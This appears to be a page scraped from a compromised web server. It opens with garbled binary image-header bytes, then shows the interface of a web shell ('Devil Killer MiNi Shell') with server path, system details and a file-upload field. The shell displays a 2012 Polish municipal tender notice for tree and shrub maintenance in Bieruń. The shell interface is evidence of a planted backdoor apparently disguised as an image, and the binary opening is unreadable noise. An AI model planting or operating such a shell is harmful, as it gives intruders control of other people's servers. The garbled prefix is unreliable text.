JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/22054-N-2012.html

<p class="kh_header"><b>Bieruń: UTRZYMANIE ZIELENI W GMINIE BIERUŃ - DRZEWA I KRZEWY</b><br>
<b>Numer ogłoszenia: 22054 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE ZIELENI W GMINIE BIERUŃ - DRZEWA I KRZEWY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest utrzymanie zieleni w Gminie Bieruń w zakresie:
1.	Pielęgnacji drzew, obejmującej następujące rodzaje prac:
a)	Wycinka - pozostawiony pień nie wyższy niż 10 cm od powierzchni gruntu;
b)	Cięcia sanitarne, prześwietleniowe (w zakresie 20% korony drzewa) obejmują swoim zakresem pielęgnację koron drzew polegającą na pielęgnacji chorych, martwych                 i połamanych gałęzi, konarów, jak również korektę statyki drzew. W czasie zabiegu nie powinno się usuwać jednorazowo więcej niż 20% masy asymilacyjnej drzewa;
c)	Redukcja korony do 50% jest zabiegiem przewidzianym dla drzew silnie zniszczonych                                (np. z wyniku silnych wiatrów huraganowych, wyładowań atmosferycznych),                                  o zaniedbanych koronach, stwarzających duże zagrożenie min. w ruchu pieszym                        i kołowym. Pozwala na przywrócenie stabilności korony na dłuższy czas. Zakres cięcia różni się od cięć sanitarnych jego rozszerzeniem do usunięcia gałęzi bardzo grubych                  z jednoczesnym zachowaniem charakterystycznego pokroju drzewa. Ze względów bezpieczeństwa dopuszcza się silniejszą redukcję. Redukcja korony o 50% możliwa jest dla gatunków: dąb, klon, jesion, topola. Specyfikacja nie zakłada redukcji korony, jako podstawowego zabiegu dokonywanego na drzewostanie, nie zakłada jednocześnie redukcji większej niż 50%, a sam zabieg jest ujęty jedynie dla w/w przypadków. Założona  w formularzu kalkulacyjnym liczba drzew jest liczbą przyjętą dla potrzeb obliczenia ceny ofertowej;
d)	Formowanie korony w kulę;
e)	Frezowanie pni;
f)	Usuwanie powalonych drzew - wiatrołomów - pozostawiony pień nie większy niż 10 cm od powierzchni gruntu;
2.	Pielęgnacji krzewów, obejmującej następujące rodzaje prac:
a)	Odmładzanie żywopłotów - poziome ścięcie wieloletnich gałęzi na wysokość żądaną przez Zamawiającego (z wycinką samosiewów do gruntu, wyrwaniem wrastającej trawy                 i usunięciem wszelkich odpadów)
b)	Przycinanie żywopłotów - poziome i pionowe ścięcie jedno i dwuletnich gałęzi                     (z wycinką samosiewów, wyrwaniem wrastającej trawy i usunięciem wszelkich odpadów).







                                                                            Ilość jednostek  krotność
a. Wycinka 	Średnica pnia	 	16-20 cm	5	1
	Średnica pnia	 	21-30 cm	5	2
	Średnica pnia	 	31-40 cm	5	1
	Średnica pnia	 	41-50 cm	5	1
	Średnica pnia	 	51-60 cm	5	1
	Dodatek za każde dalsze	10 cm	5	5
b. Cięcia sanitarne	Średnica pnia	 	do 10 cm	10	3
	Średnica pnia	 	11-15 cm	10	2
	Średnica pnia	 	16-20 cm	15	2
	Średnica pnia	 	21-30 cm	20	2
	Średnica pnia	 	31-40 cm	10	2
	Średnica pnia	 	41-50 cm	10	1
	Średnica pnia	 	51-60 cm	5	1
	Dodatek za każde dalsze	10 cm	10	10
c. Redukcja korony	Średnica pnia	 	16-20 cm	5	2
	Średnica pnia	 	21-30 cm	5	2
	Średnica pnia	 	31-40 cm	5	2
	Średnica pnia	 	41-50 cm	5	2
	Średnica pnia	 	51-60 cm	5	2
	Dodatek za każde dalsze	10 cm	15	25
d. Formowanie korony 	Średnica pnia	 	do 15 cm	15	1
	Średnica pnia	 	16-20 cm	15	2
	Średnica pnia	 	21-30 cm	20	2
	Średnica pnia	 	31-40 cm	25	2
	Średnica pnia	 	41-50 cm	10	2
	Dodatek za każde dalsze	10 cm	5	10
b-d Dodatek do drzewa za pracę na drzewach wyższych niż 20 m	szt	20	1
a-d Dodatek do drzewa za wyłączenie energii i nadzór energetyczny 	szt	3	2
e.Frezowanie pni	Powierzchnia pnia	 	dm2	50	1
f. Usuwanie wiatrołomów	Średnica pnia	 	16-20 cm	1	1
	Średnica pnia	 	21-30 cm	1	1
	Średnica pnia	 	31-40 cm	1	2
	Średnica pnia	 	41-50 cm	1	2
	Średnica pnia	 	51-60 cm	2	2
	Dodatek za każde dalsze	10 cm	10	10
				 	 	 
				 	 	 
a.Odmładzanie żywopłotów	Przycinany szpaler	mb	2000	1
b. Przycinanie żywopłotów	Przycinany szpaler	mb	4000	1



W/w prace zostaną każdorazowo zlecane przez inspektora Wydziału Gospodarki Komunalnej. Powstałe przy realizacji zamówienia odpady zagospodaruje Wykonawca.
Uzupełnienie opisu przedmiotu zamówienia znajduje się we wzorze umowy stanowiącej załącznik do SIWZ.    
										
Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, udzielenia zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów, stosowania wymagań, o których mowa w art. 29 ust. 4   ustawy pzp. 
Zamawiający nie dopuszcza składania ofert częściowych i  wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości 1 000,00 zł (słownie: jeden tysiąc złotych) musi być wniesione w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem tzn. przelać z rachunku bankowego wykonawcy na rachunek bankowy zamawiającego.
w BS O/Tychy numer konta: 26 8435 0004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP. 2710.7.2012  Przetarg nieograniczony na wybór wykonawcy
zamówienia p.n. Utrzymanie zieleni w gminie Bieruń - drzewa i krzewy.
Termin - wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium, wpłaconego przelewem,
na rachunku zamawiającego nie później niż do godz. 12:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 12:00 w dniu wyznaczonym do składania ofert.
Wadium może być wniesione w następujących formach:
1)  w pieniądzu przelewem,
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)  w gwarancjach bankowych,
4)  w gwarancjach ubezpieczeniowych,
5) w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).

Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, należy wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art.24 ust.2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2) Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.

3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę :
-oświadczenia (zgodnie z art. 22 ust.1 pkt 1 ustawy pzp ),
      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
      wykazać,   że   warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie:
Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługę/usługi dotyczące pielęgnacji  drzew lub drzew i krzewów obejmujących swym zakresem co najmniej wycinkę drzew i cięcia sanitarne drzew, o łącznej wartości minimum 75 000,00 zł brutto.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia / nie spełnia, na podstawie przedłożonych w ofercie: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ) ,
- dokumentów: wykazu wykonanych usług dot. pielęgnacji drzew, lub drzew i krzewów   
  obejmujących swym zakresem przynajmniej wycinkę drzew i cięcia sanitarne drzew             
   z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu   
  (np. referencji) potwierdzającego, że usługi te zostały wykonane należycie.

Dla spełnienia warunku należy wykazać się usługami obejmujących swym zakresem przynajmniej wycinkę drzew i cięcia sanitarne drzew. Wykonaniem tylko jednego rodzaju z w/w usług tj. wycinki drzew lub wykonanie cięć sanitarnych, zamawiający nie uzna za spełnienie wymaganego warunku. 

Zamawiający nie uzna dla spełnienia w/w warunku innych usług dot. pielęgnacji zieleni               np. obsady kwiatowej, pielęgnacji trawników. 
      W przypadku usług nadal wykonywanych (umów nie zakończonych np. z terminem realizacji                w latach 2010-2012) dla spełnienia warunków należy wykazać wartość usług już należycie wykonanych i odebranych.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców w całym wymaganym zakresie tzn., wykonania usług dotyczących pielęgnacji  drzew lub drzew  i krzewów obejmujących swym zakresem co najmniej wycinkę drzew i cięcia sanitarne drzew, o łącznej wartości minimum 75 000,00 zł brutto   lub wykonawcy wchodzący w skład podmiotu wspólnego spełniają warunek łącznie tzn. łączna wartość wykonanych przez nich usług w zakresie w/w warunku  wynosi minimum 75 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. 
        Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie    
        przedłożonego przez wykonawcę :
        - oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ).
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
       wykazać,   że   warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
        Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie  
        przedłożonego przez wykonawcę :
        -oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ) ,
      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
      wykazać,   że   warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:         
         Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie          
         przedłożonego przez wykonawcę:
         - oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp ).
      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
      wykazać,   że   warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1)	Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie potrzebne do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 

Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
1)	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentu, o którym mowa w punkcie  1 Listy wymaganych dokumentów 
       przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że:
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
     Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed     
     upływem terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa w pkt 1
        niniejszej uwagi.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
    3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz                   w przypadku  podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
    4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          
        zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   
        niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
        sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   
        niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 
        zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres 
        korzystania z nich przy wykonywaniu zamówienia. Obowiązkiem wykonawcy w przypadku, gdy 
        korzysta z potencjałów podmiotów trzecich, jest rzeczywiste wykazanie, że tym potencjałem 
        będzie dysponował. 





5) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. 
     konsorcjum/spółki cywilnej) do oferty należy dołączyć : 
a)Informacje w zakresie oznaczenia stron wchodzących w skład podmiotu wspólnego, zasady 
   reprezentacji  ze wskazaniem pełnomocnika (lidera), jego zakresu działania i uprawnień do 
   reprezentowania wykonawców w postępowaniu o udzielenie zamówienia  albo reprezentowania 
   w postępowaniu i zawarcia umowy. Pełnomocnictwo należy załączyć w formie oryginału lub 
    notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z 
    Pełnomocnikiem / Liderem.
    b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                 
           o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili  łącznie.
 c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Listy wymaganych dokumentów  składa  każdy            z wykonawców wchodzących w skład podmiotu występującego wspólnie.
      d) Dokumenty wymienione w pkt. V B ppkt.3  Listy dokumentów powinny być złożone w taki 
          sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili 
          łącznie.      
Do oferty należy  załączyć informacje  w zakresie:
1) Części zamówienia, która  zostanie powierzona podwykonawcom. W przypadku
    braku złożenia informacji lub braku wypełnienia formularza ofertowego w tym zakresie,  
    zamawiający uzna, że wykonawca wykona całość zamówienia sam, bez powierzenia części 
    zamówienia podwykonawcom.              
2) Sposobu reprezentacji podmiotów występujących wspólnie (pełnomocnictwo) -                          
     w  przypadku ich udziału w postępowaniu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
